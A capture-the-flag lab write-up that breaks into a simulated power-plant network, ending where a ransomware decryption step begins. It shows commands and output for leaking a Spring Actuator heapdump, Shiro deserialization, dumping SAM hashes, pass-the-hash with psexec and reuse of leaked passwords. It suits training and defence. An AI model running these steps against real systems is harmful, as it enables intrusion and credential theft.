春秋云镜 (Chunqiu Yunjing) - ThermalPower

  1. FLAG01
  2. FLAG02
  3. FLAG03
  4. FLAG04

FLAG01

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# ../../pentest/fscan/fscan2 -h 39.98.122.145
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-05-01 23:10:46] [INFO] Brute-force threads: 1
[2025-05-01 23:10:46] [INFO] Starting information scan
[2025-05-01 23:10:46] [INFO] Final valid host count: 1
[2025-05-01 23:10:46] [INFO] Starting host scan
[2025-05-01 23:10:46] [INFO] Valid port count: 233
[2025-05-01 23:10:46] [SUCCESS] Port open 39.98.122.145:22
[2025-05-01 23:10:47] [SUCCESS] Service identified 39.98.122.145:22 => [ssh] version:8.2p1 Ubuntu 4ubuntu0.9 product:OpenSSH os:Linux info:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-05-01 23:10:49] [SUCCESS] Port open 39.98.122.145:8080
[2025-05-01 23:10:54] [SUCCESS] Service identified 39.98.122.145:8080 => [http]
[2025-05-01 23:10:56] [INFO] Live port count: 2
[2025-05-01 23:10:56] [INFO] Starting vulnerability scan
[2025-05-01 23:10:56] [INFO] Loaded plugins: ssh, webpoc, webtitle
[2025-05-01 23:10:56] [SUCCESS] Web title http://39.98.122.145:8080 status:302 length:0 title:(none) redirect: http://39.98.122.145:8080/login;jsessionid=C10B39BA0BC886E7924F52A8BA23B5B6
[2025-05-01 23:10:57] [SUCCESS] Web title http://39.98.122.145:8080/login;jsessionid=C10B39BA0BC886E7924F52A8BA23B5B6 status:200 length:2936 title:火创能源监控画面管理平台 (Huochuang Energy monitoring-screen management platform)
[2025-05-01 23:11:00] [SUCCESS] Target: http://39.98.122.145:8080
Vulnerability type: poc-yaml-spring-actuator-heapdump-file
Vulnerability name:
Details:
author:AgeloVito
links:https://www.cnblogs.com/wyb628/p/8567610.html
[2025-05-01 23:11:00] [SUCCESS] Target: http://39.98.122.145:8080
Vulnerability type: poc-yaml-springboot-env-unauth
Vulnerability name: spring2
Details:
links:https://github.com/LandGrey/SpringBootVulExploit
[2025-05-01 23:11:03] [SUCCESS] Scan finished: 3/3

The scan flags poc-yaml-spring-actuator-heapdump-file on port 8080 (and, alongside it, an unauthenticated /actuator/env). A heapdump is a full snapshot of the JVM heap, so any secret the application ever held in memory is in it. First download the heapdump file:

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# wget http://39.98.122.145:8080/actuator/heapdump
--2025-05-01 23:13:13-- http://39.98.122.145:8080/actuator/heapdump
Connecting to 39.98.122.145:8080... connected.
HTTP request sent, awaiting response... 200
Length: 31181349 (30M) [application/octet-stream]
Saving to: ‘heapdump’

heapdump 100%[=================================================>] 29.74M 1.36MB/s in 21s

2025-05-01 23:13:35 (1.41 MB/s) - ‘heapdump’ saved [31181349/31181349]

Then analyze it with JDumpSpider, which walks the heap looking for data-source configuration, Shiro keys, property sources and credentials:

┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump
===========================================
SpringDataSourceProperties
-------------
not found!

===========================================
WeblogicDataSourceConnectionPoolConfig
-------------
not found!

===========================================
MongoClient
-------------
not found!

===========================================
AliDruidDataSourceWrapper
-------------
not found!

===========================================
HikariDataSource
-------------
not found!

===========================================
RedisStandaloneConfiguration
-------------
not found!

===========================================
JedisClient
-------------
not found!

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = QZYysgMYhG6/CzIJlVpR2g==, algName = AES

===========================================
OriginTrackedMapPropertySource
-------------
management.endpoints.web.exposure.include = *
spring.thymeleaf.encoding = UTF-8
management.endpoint.health.show-details = always
spring.thymeleaf.cache = true
spring.thymeleaf.content-type = text/html
server.port = 8080
spring.thymeleaf.check-template = true
management.endpoints.jmx.exposure.include = *

===========================================
MutablePropertySources
-------------
awt.toolkit = sun.awt.X11.XToolkit
sun.boot.class.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/resources.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/rt.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jsse.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jce.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/charsets.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jfr.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/classes
java.protocol.handler.pkgs = org.springframework.boot.loader
sun.management.compiler = HotSpot 64-Bit Tiered Compilers
sun.cpu.isalist =
sun.jnu.encoding = UTF-8
java.runtime.version = 1.8.0_392-8u392-ga-1~20.04-b08
java.class.path = /opt/ThermalSecurity/Thermal-Security-0.0.1-SNAPSHOT.jar
path.separator = :
java.vm.vendor = Private Build
os.version = 5.4.0-166-generic
java.endorsed.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/endorsed
java.runtime.name = OpenJDK Runtime Environment
file.encoding = UTF-8
catalina.useNaming = false
spring.beaninfo.ignore = true
java.vm.specification.version = 1.8
os.name = Linux
java.vm.name = OpenJDK 64-Bit Server VM
local.server.port = null
user.country = US
java.vendor.url.bug = http://bugreport.sun.com/bugreport/
sun.java.command = /opt/ThermalSecurity/Thermal-Security-0.0.1-SNAPSHOT.jar
java.io.tmpdir = /tmp
catalina.home = /tmp/tomcat.8080.2227855515484347988
java.version = 1.8.0_392
user.home = /root
user.language = en
PID = 620
java.awt.printerjob = sun.print.PSPrinterJob
CONSOLE_LOG_CHARSET = UTF-8
file.separator = /
catalina.base = /tmp/tomcat.8080.2227855515484347988
java.vm.info = mixed mode
java.specification.name = Java Platform API Specification
java.vm.specification.vendor = Oracle Corporation
FILE_LOG_CHARSET = UTF-8
java.awt.graphicsenv = sun.awt.X11GraphicsEnvironment
java.awt.headless = true
sun.io.unicode.encoding = UnicodeLittle
java.ext.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ext:/usr/java/packages/lib/ext

===========================================
MapPropertySources
-------------
local.server.port = null

===========================================
ConsulPropertySources
-------------
not found!

===========================================
JavaProperties
-------------
java.util.logging.FileHandler.pattern = %h/java%u.log
awt.toolkit = sun.awt.X11.XToolkit
sun.cpu.isalist =
sun.jnu.encoding = UTF-8
java.class.path = /opt/ThermalSecurity/Thermal-Security-0.0.1-SNAPSHOT.jar
jdk.security.legacyAlgorithms = SHA1, RSA keySize < 2048, DSA keySize < 2048
java.vm.vendor = Private Build
jdk.disabled.namedCurves = secp112r1, secp112r2, secp128r1, secp128r2, secp160k1, secp160r1, secp160r2, secp192k1, secp192r1, secp224k1, secp224r1, secp256k1, sect113r1, sect113r2, sect131r1, sect131r2, sect163k1, sect163r1, sect163r2, sect193r1, sect193r2, sect233k1, sect233r1, sect239k1, sect283k1, sect283r1, sect409k1, sect409r1, sect571k1, sect571r1, X9.62 c2tnb191v1, X9.62 c2tnb191v2, X9.62 c2tnb191v3, X9.62 c2tnb239v1, X9.62 c2tnb239v2, X9.62 c2tnb239v3, X9.62 c2tnb359v1, X9.62 c2tnb431r1, X9.62 prime192v2, X9.62 prime192v3, X9.62 prime239v1, X9.62 prime239v2, X9.62 prime239v3, brainpoolP256r1, brainpoolP320r1, brainpoolP384r1, brainpoolP512r1
crypto.policy = unlimited
jceks.key.serialFilter = java.lang.Enum;java.security.KeyRep;java.security.KeyRep$Type;javax.crypto.spec.SecretKeySpec;!*
sun.arch.data.model = 64
login.configuration.provider = sun.security.provider.ConfigFile
catalina.useNaming = false
user.timezone =
security.overridePropertiesFile = true
java.vm.specification.version = 1.8
os.name = Linux
user.country = US
security.provider.7 = com.sun.security.sasl.Provider
sun.boot.library.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/amd64
sun.java.command = /opt/ThermalSecurity/Thermal-Security-0.0.1-SNAPSHOT.jar
security.provider.9 = sun.security.smartcardio.SunPCSC
jdk.security.caDistrustPolicies = SYMANTEC_TLS
sun.cpu.endian = little
user.home = /root
user.language = en
java.specification.vendor = Oracle Corporation
en = UTF-8
security.provider.1 = sun.security.provider.Sun
security.provider.2 = sun.security.rsa.SunRsaSign
security.provider.3 = sun.security.ec.SunEC
networkaddress.cache.negative.ttl = 10
jdk.tls.alpnCharset = ISO_8859_1
security.provider.4 = com.sun.net.ssl.internal.ssl.Provider
security.provider.5 = com.sun.crypto.provider.SunJCE
security.provider.6 = sun.security.jgss.SunProvider
ssl.KeyManagerFactory.algorithm = SunX509
file.separator = /
java.specification.name = Java Platform API Specification
java.vm.specification.vendor = Oracle Corporation
FILE_LOG_CHARSET = UTF-8
.level = INFO
java.awt.graphicsenv = sun.awt.X11GraphicsEnvironment
ja = UTF-8
java.awt.headless = true
com.xyz.foo.level = SEVERE
package.definition = sun.,com.sun.xml.internal.,com.sun.imageio.,com.sun.istack.internal.,com.sun.jmx.,com.sun.media.sound.,com.sun.naming.internal.,com.sun.proxy.,com.sun.corba.se.,com.sun.org.apache.bcel.internal.,com.sun.org.apache.regexp.internal.,com.sun.org.apache.xerces.internal.,com.sun.org.apache.xpath.internal.,com.sun.org.apache.xalan.internal.extensions.,com.sun.org.apache.xalan.internal.lib.,com.sun.org.apache.xalan.internal.res.,com.sun.org.apache.xalan.internal.templates.,com.sun.org.apache.xalan.internal.utils.,com.sun.org.apache.xalan.internal.xslt.,com.sun.org.apache.xalan.internal.xsltc.cmdline.,com.sun.org.apache.xalan.internal.xsltc.compiler.,com.sun.org.apache.xalan.internal.xsltc.trax.,com.sun.org.apache.xalan.internal.xsltc.util.,com.sun.org.apache.xml.internal.res.,com.sun.org.apache.xml.internal.resolver.helpers.,com.sun.org.apache.xml.internal.resolver.readers.,com.sun.org.apache.xml.internal.security.,com.sun.org.apache.xml.internal.serializer.utils.,com.sun.org.apache.xml.internal.utils.,com.sun.org.glassfish.,com.oracle.xmlns.internal.,com.oracle.webservices.internal.,oracle.jrockit.jfr.,org.jcp.xml.dsig.internal.,jdk.internal.,jdk.nashorn.internal.,jdk.nashorn.tools.,jdk.xml.internal.,com.sun.activation.registries.,jdk.jfr.events.,jdk.jfr.internal.,jdk.management.jfr.internal.
sun.boot.class.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/resources.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/rt.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jsse.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jce.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/charsets.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jfr.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/classes
java.protocol.handler.pkgs = org.springframework.boot.loader
sun.management.compiler = HotSpot 64-Bit Tiered Compilers
java.runtime.version = 1.8.0_392-8u392-ga-1~20.04-b08
policy.provider = sun.security.provider.PolicyFile
user.name = root
policy.url.1 = file:${java.home}/lib/security/java.policy
path.separator = :
fr = UTF-8
securerandom.source = file:/dev/random
policy.url.2 = file:${user.home}/.java.policy
jdk.tls.disabledAlgorithms = SSLv3, TLSv1, TLSv1.1, RC4, DES, MD5withRSA, DH keySize < 1024, EC keySize < 224, 3DES_EDE_CBC, anon, NULL, include jdk.disabled.namedCurves
os.version = 5.4.0-166-generic
java.endorsed.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/endorsed
policy.ignoreIdentityScope = false
java.runtime.name = OpenJDK Runtime Environment
keystore.type.compat = true
file.encoding = UTF-8
spring.beaninfo.ignore = true
java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter
java.vm.name = OpenJDK 64-Bit Server VM
jdk.sasl.disabledMechanisms =
java.vendor.url.bug = http://bugreport.sun.com/bugreport/
java.io.tmpdir = /tmp
java.util.logging.FileHandler.formatter = java.util.logging.XMLFormatter
java.util.logging.FileHandler.count = 1
catalina.home = /tmp/tomcat.8080.2227855515484347988
java.version = 1.8.0_392
sun.cds.enableSharedLookupCache = false
sun.security.krb5.maxReferrals = 5
jdk.tls.keyLimits = AES/GCM/NoPadding KeyUpdate 2^37
PID = 620
java.vm.specification.name = Java Virtual Machine Specification
java.awt.printerjob = sun.print.PSPrinterJob
CONSOLE_LOG_CHARSET = UTF-8
jdk.xml.dsig.secureValidationPolicy = disallowAlg http://www.w3.org/TR/1999/REC-xslt-19991116,disallowAlg http://www.w3.org/2001/04/xmldsig-more#rsa-md5,disallowAlg http://www.w3.org/2001/04/xmldsig-more#hmac-md5,disallowAlg http://www.w3.org/2001/04/xmldsig-more#md5,maxTransforms 5,maxReferences 30,disallowReferenceUriSchemes file http https,minKeySize RSA 1024,minKeySize DSA 1024,minKeySize EC 224,noDuplicateIds,noRetrievalMethodLoops
catalina.base = /tmp/tomcat.8080.2227855515484347988
java.library.path = /usr/java/packages/lib/amd64:/usr/lib/x86_64-linux-gnu/jni:/lib/x86_64-linux-gnu:/usr/lib/x86_64-linux-gnu:/usr/lib/jni:/lib:/usr/lib
java.util.logging.FileHandler.limit = 50000
java.vm.info = mixed mode, sharing
java.vendor = Private Build
keystore.type = jks
java.specification.maintenance.version = 5
handlers = java.util.logging.ConsoleHandler
sun.io.unicode.encoding = UnicodeLittle
java.ext.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ext:/usr/java/packages/lib/ext
policy.expandProperties = true
securerandom.strongAlgorithms = NativePRNGBlocking:SUN
krb5.kdc.bad.policy = tryLast

===========================================
ProcessEnvironment
-------------
not found!

===========================================
OSS
-------------
not found!

===========================================
UserPassSearcher
-------------
org.apache.shiro.web.filter.authc.FormAuthenticationFilter:
[failureKeyAttribute = shiroLoginFailure, loginUrl = /login, successUrl = /, usernameParam = username, passwordParam = password]

org.apache.catalina.startup.Tomcat:
[hostname = localhost]


===========================================
CookieThief
-------------
not found!

===========================================
AuthThief
-------------
not found!

===========================================
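The OriginTrackedMapPropertySource section above shows the root cause of this whole first step: management.endpoints.web.exposure.include = * publishes every Actuator endpoint, heapdump and env included, over HTTP with no authentication. As an added note that is not part of the original writeup, here is that setting beside a tightened version using the standard Spring Boot 2.x management properties (the separate management port and bind address are illustrative choices, not values from the target):

```properties
# --- as recovered from the heapdump: every actuator endpoint reachable over HTTP ---
management.endpoints.web.exposure.include=*
management.endpoints.jmx.exposure.include=*
management.endpoint.health.show-details=always

# --- hardened: expose only what monitoring needs, switch the dangerous endpoints off,
# --- and keep the management interface off the application listener
management.endpoints.web.exposure.include=health,info
management.endpoints.jmx.exposure.include=
management.endpoint.heapdump.enabled=false
management.endpoint.env.enabled=false
management.endpoint.health.show-details=when-authorized
management.server.port=9090
management.server.address=127.0.0.1
```

The two halves are shown in one block for comparison only; in a real application.properties the last value of a key wins, so only one of them should be present. Disabling heapdump and env is the part that matters: exposure.include alone can be widened again by the next developer who needs a metric, whereas a disabled endpoint is not served at all.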

The useful part is this: the heap contains a Shiro rememberMe key. algMode = CBC tells you to use the AES-CBC cookie format rather than the GCM format newer Shiro versions default to. From here it is the standard Shiro route: hand the key to a Shiro exploitation tool, deliver a deserialization gadget chain through the rememberMe cookie and inject a memory shell.

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = QZYysgMYhG6/CzIJlVpR2g==, algName = AES

flag01 is in the root directory (/). The heapdump already showed the application running as root (user.name = root, user.home = /root), so the memory shell runs as root as well.

FLAG02

Through the memory shell, drop an SSH public key into /root/.ssh/authorized_keys, SSH in as root, upload fscan and set up a proxy into the internal network.

Scan the internal network with fscan:

root@security:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:16:3e:2f:44:6e brd ff:ff:ff:ff:ff:ff
inet 172.22.17.213/16 brd 172.22.255.255 scope global dynamic eth0
valid_lft 315359102sec preferred_lft 315359102sec
inet6 fe80::216:3eff:fe2f:446e/64 scope link
valid_lft forever preferred_lft forever
root@security:~# ./fscan2 -h 172.22.17.213/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-05-02 11:23:19] [INFO] Brute-force threads: 1
[2025-05-02 11:23:19] [INFO] Starting information scan
[2025-05-02 11:23:19] [INFO] CIDR range: 172.22.17.0-172.22.17.255
[2025-05-02 11:23:20] [INFO] Generated IP range: 172.22.17.0.%!d(string=172.22.17.255) - %!s(MISSING).%!d(MISSING)
[2025-05-02 11:23:20] [INFO] Parsed CIDR 172.22.17.213/24 -> IP range 172.22.17.0-172.22.17.255
[2025-05-02 11:23:20] [INFO] Final valid host count: 256
[2025-05-02 11:23:20] [INFO] Starting host scan
[2025-05-02 11:23:20] [SUCCESS] Target 172.22.17.6 alive (ICMP)
[2025-05-02 11:23:20] [SUCCESS] Target 172.22.17.213 alive (ICMP)
[2025-05-02 11:23:23] [INFO] Live host count: 2
[2025-05-02 11:23:23] [INFO] Valid port count: 233
[2025-05-02 11:23:23] [SUCCESS] Port open 172.22.17.6:445
[2025-05-02 11:23:23] [SUCCESS] Port open 172.22.17.6:139
[2025-05-02 11:23:23] [SUCCESS] Port open 172.22.17.6:135
[2025-05-02 11:23:23] [SUCCESS] Port open 172.22.17.6:21
[2025-05-02 11:23:23] [SUCCESS] Port open 172.22.17.6:80
[2025-05-02 11:23:23] [SUCCESS] Port open 172.22.17.213:22
[2025-05-02 11:23:23] [SUCCESS] Port open 172.22.17.213:8080
[2025-05-02 11:23:23] [SUCCESS] Service identified 172.22.17.6:21 => [ftp] product:Microsoft ftpd os:Windows Banner:[220 Microsoft FTP Service.]
[2025-05-02 11:23:23] [SUCCESS] Service identified 172.22.17.213:22 => [ssh] version:8.2p1 Ubuntu 4ubuntu0.9 product:OpenSSH os:Linux info:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-05-02 11:23:28] [SUCCESS] Service identified 172.22.17.6:445 =>
[2025-05-02 11:23:28] [SUCCESS] Service identified 172.22.17.6:139 => Banner:[.]
[2025-05-02 11:23:28] [SUCCESS] Service identified 172.22.17.213:8080 => [http]
[2025-05-02 11:23:28] [SUCCESS] Service identified 172.22.17.6:80 => [http]
[2025-05-02 11:24:28] [SUCCESS] Service identified 172.22.17.6:135 =>
[2025-05-02 11:24:28] [INFO] Live port count: 7
[2025-05-02 11:24:28] [INFO] Starting vulnerability scan
[2025-05-02 11:24:28] [INFO] Loaded plugins: findnet, ftp, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-05-02 11:24:28] [SUCCESS] Web title http://172.22.17.6 status:200 length:661 title:172.22.17.6 - /
[2025-05-02 11:24:28] [SUCCESS] NetBios 172.22.17.6 WORKGROUP\WIN-ENGINEER
[2025-05-02 11:24:28] [SUCCESS] NetInfo scan result
Target host: 172.22.17.6
Hostname: WIN-ENGINEER
Discovered network interfaces:
IPv4 addresses:
└─ 172.22.17.6
[2025-05-02 11:24:28] [SUCCESS] Web title http://172.22.17.213:8080 status:302 length:0 title:(none) redirect: http://172.22.17.213:8080/login;jsessionid=AE53E4C807EB6DEB9B204E7B4201FDFF
[2025-05-02 11:24:28] [SUCCESS] Anonymous login succeeded!
[2025-05-02 11:24:28] [SUCCESS] Web title http://172.22.17.213:8080/login;jsessionid=AE53E4C807EB6DEB9B204E7B4201FDFF status:200 length:2936 title:火创能源监控画面管理平台 (Huochuang Energy monitoring-screen management platform)
[2025-05-02 11:24:29] [SUCCESS] Target: http://172.22.17.213:8080
Vulnerability type: poc-yaml-spring-actuator-heapdump-file
Vulnerability name:
Details:
author:AgeloVito
links:https://www.cnblogs.com/wyb628/p/8567610.html
[2025-05-02 11:24:30] [SUCCESS] Target: http://172.22.17.213:8080
Vulnerability type: poc-yaml-springboot-env-unauth
Vulnerability name: spring2
Details:
links:https://github.com/LandGrey/SpringBootVulExploit
The interesting host is 172.22.17.6 (WIN-ENGINEER):

[2025-05-02 11:23:23] [SUCCESS] Port open 172.22.17.6:445
[2025-05-02 11:23:23] [SUCCESS] Port open 172.22.17.6:139
[2025-05-02 11:23:23] [SUCCESS] Port open 172.22.17.6:135
[2025-05-02 11:23:23] [SUCCESS] Port open 172.22.17.6:21
[2025-05-02 11:23:23] [SUCCESS] Port open 172.22.17.6:80

Start with FTP. Anonymous login works (fscan reported it above), but Chinese filenames come out garbled; the files are the same ones listed by the directory listing on port 80, so download them from whichever service is more convenient.

内部通知.docx (an internal notice) gives the password rule:

Login account setup:
For ease of management and standardization, login account names use the employee's full name in lowercase pinyin. For example, Zhang San's account name is zhangsan and his employee number is 0801. The initial password is the account name + @ + employee number, e.g. zhangsan@0801.

There is also a contact directory (通讯录). Combining its names and employee numbers with this rule yields a credential list; many of the accounts still have their initial password and any one of them will do:

chenhua/chenhua@0813

Connect over RDP with it. A file scad.txt on the box also gives an administrator password:

WIN-SCADA: 172.22.26.xx
Username: Administrator
Password: IYnT3GyCiy3

But this is not the Administrator password for this host (it belongs to the WIN-SCADA machine and is used later). The challenge description hints at the intended path:

Level story:
Try to take over the SCADA engineer's personal PC and escalate to SYSTEM by abusing a Windows privileged group.

Check the current user's group memberships:

C:\Users\chenhua>net user chenhua
User name                    chenhua
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2023/12/26 0:47:03
Password expires             Never
Password changeable          2023/12/26 0:47:03
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2025/5/2 11:36:30

Logon hours allowed          All

Local Group Memberships      *Backup Operators     *Remote Desktop Users
                             *Users
Global Group memberships     *None
The command completed successfully.

chenhua is a member of Backup Operators. That group carries SeBackupPrivilege, which lets a process read any file or registry hive regardless of its ACL; whoami /priv shows it as Disabled until a program enables it, which reg.exe does on its own when saving a hive. So the registry route to the local password hashes works directly: save the SAM and SYSTEM hives.

PS C:\users\chenhua\Desktop> reg save hklm\sam sam.hive
The operation completed successfully.
PS C:\users\chenhua\Desktop> reg save hklm\system system.hive
The operation completed successfully.

Copy both hives off the box and extract the NT hashes with secretsdump (impacket-secretsdump -sam sam.hive -system system.hive LOCAL); the SYSTEM hive supplies the boot key that the SAM hashes are encrypted with:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:f82292b7ac79b05d5b0e3d302bd0d279:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:a2fa2853651307ab9936cc95c0e0acf5:::
chentao:1000:aad3b435b51404eeaad3b435b51404ee:47466010c82da0b75328192959da3658:::
zhaoli:1001:aad3b435b51404eeaad3b435b51404ee:2b83822caab67ef07b614d05fd72e215:::
wangning:1002:aad3b435b51404eeaad3b435b51404ee:3c52d89c176321511ec686d6c05770e3:::
zhangling:1003:aad3b435b51404eeaad3b435b51404ee:8349a4c5dd1bdcbc5a14333dd13d9f81:::
zhangying:1004:aad3b435b51404eeaad3b435b51404ee:8497fa5480a163cb7817f23a8525be7d:::
lilong:1005:aad3b435b51404eeaad3b435b51404ee:c3612c48cf829d1149f7a4e3ef4acb8a:::
liyumei:1006:aad3b435b51404eeaad3b435b51404ee:63ddcde0fa219c75e48e2cba6ea8c471:::
wangzhiqiang:1007:aad3b435b51404eeaad3b435b51404ee:5a661f54da156dc93a5b546ea143ea07:::
zhouyong:1008:aad3b435b51404eeaad3b435b51404ee:5d49bf647380720b9f6a15dbc3ffe432:::
chenhua:1009:aad3b435b51404eeaad3b435b51404ee:07ff24422b538b97f3c297cc8ddc7615:::
┌──(root㉿kali)-[~/Desktop/tmp/tmp]
└─# impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:f82292b7ac79b05d5b0e3d302bd0d279 Administrator@172.22.17.6

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 172.22.17.6.....
[*] Found writable share ADMIN$
[*] Uploading file odkqcbIH.exe
[*] Opening SVCManager on 172.22.17.6.....
[*] Creating service CFcL on 172.22.17.6.....
[*] Starting service CFcL.....
[!] Press help for extra shell commands
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [Version 10.0.20348.2113]

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
(c) Microsoft Corporation. All rights reserved.


C:\Windows\system32> type C:\Users\Administrator\flag\flag02.txt

FLAG03

The scad.txt credentials come into play now. They point at the 172.22.26.0/24 range, so scan it with fscan through the proxy:

WIN-SCADA: 172.22.26.xx
Username: Administrator
Password: IYnT3GyCiy3
root@security:~# ./fscan2 -h 172.22.26.1/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0

[2025-05-02 12:42:59] [INFO] Brute-force threads: 1
[2025-05-02 12:42:59] [INFO] Starting information scan
[2025-05-02 12:42:59] [INFO] CIDR range: 172.22.26.0-172.22.26.255
[2025-05-02 12:42:59] [INFO] Generated IP range: 172.22.26.0.%!d(string=172.22.26.255) - %!s(MISSING).%!d(MISSING)
[2025-05-02 12:42:59] [INFO] Parsed CIDR 172.22.26.1/24 -> IP range 172.22.26.0-172.22.26.255
[2025-05-02 12:42:59] [INFO] Final valid host count: 256
[2025-05-02 12:42:59] [INFO] Starting host scan
[2025-05-02 12:42:59] [SUCCESS] Target 172.22.26.11 alive (ICMP)
[2025-05-02 12:43:02] [INFO] Live host count: 1
[2025-05-02 12:43:02] [INFO] Valid port count: 233
[2025-05-02 12:43:02] [SUCCESS] Port open 172.22.26.11:135
[2025-05-02 12:43:02] [SUCCESS] Port open 172.22.26.11:139
[2025-05-02 12:43:02] [SUCCESS] Port open 172.22.26.11:80
[2025-05-02 12:43:02] [SUCCESS] Port open 172.22.26.11:1433
[2025-05-02 12:43:02] [SUCCESS] Port open 172.22.26.11:445
[2025-05-02 12:43:07] [SUCCESS] Service identified 172.22.26.11:139 => Banner:[.]
[2025-05-02 12:43:07] [SUCCESS] Service identified 172.22.26.11:1433 => [ms-sql-s] version:13.00.4001; SP1 product:Microsoft SQL Server 2016 os:Windows Banner:[.%.]
[2025-05-02 12:43:07] [SUCCESS] Service identified 172.22.26.11:445 =>
[2025-05-02 12:43:08] [SUCCESS] Service identified 172.22.26.11:80 => [http]

Connect to 172.22.26.11 over RDP with Administrator / IYnT3GyCiy3. The SCADA software starts automatically at logon; starting the boiler in it reveals flag03. Note the SQL Server 2016 instance on 1433 as well: an encrypted SQL dump from this host (ScadaDB.sql.locky) is what the next part is about.

FLAG04

On the desktop there is a ransom note, 解密你的文件.txt ("decrypt your files"):

** Your files have been encrypted **

We are sorry, but the files on your computer have been encrypted. To unlock your files you need to pay a ransom.

-----------------------------------------
|                 Notice                |
-----------------------------------------
| 1. Do not attempt to delete or modify the encrypted files.  |
| 2. Do not attempt to recover files before paying the ransom. |
| 3. Pay the ransom within the stated time.                    |
-----------------------------------------

To obtain the decryption key and further instructions, visit our payment site:
[payment site link]

If the payment site cannot be reached, contact us by e-mail:
contact@ransomware.com

Ransom amount: 2 bitcoin

-----------------------------------------
| Warning: attempting to recover the files or contacting the police will result in permanent loss of your files. |
-----------------------------------------

Bitcoin payment address: 1ABcDefGhijxLxnxpxrsxUvwxYZabcdEf

The desktop also holds two .locky files, the challenge attachment provides two keys (privateKey and encryptedAesKey), and C:\ contains the ransomware binary, Lockyou.exe.

Decompiling Lockyou.exe with dnSpy shows the encryption logic. It follows the Locky family's hybrid scheme (a per-victim AES key, itself RSA-encrypted), so from the .NET code the decryption path is:

  • First RSA-decrypt the encrypted encryptedAesKey with privateKey to obtain AES_KEY

  • Then AES-decrypt the encrypted file ScadaDB.sql.locky with AES_KEY to obtain ScadaDB.sql

Convert privateKey from the .NET XML format (RSAKeyValue) to PEM with a tool to obtain PRIVATE_KEY:

-----BEGIN PRIVATE KEY-----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-----END PRIVATE KEY-----
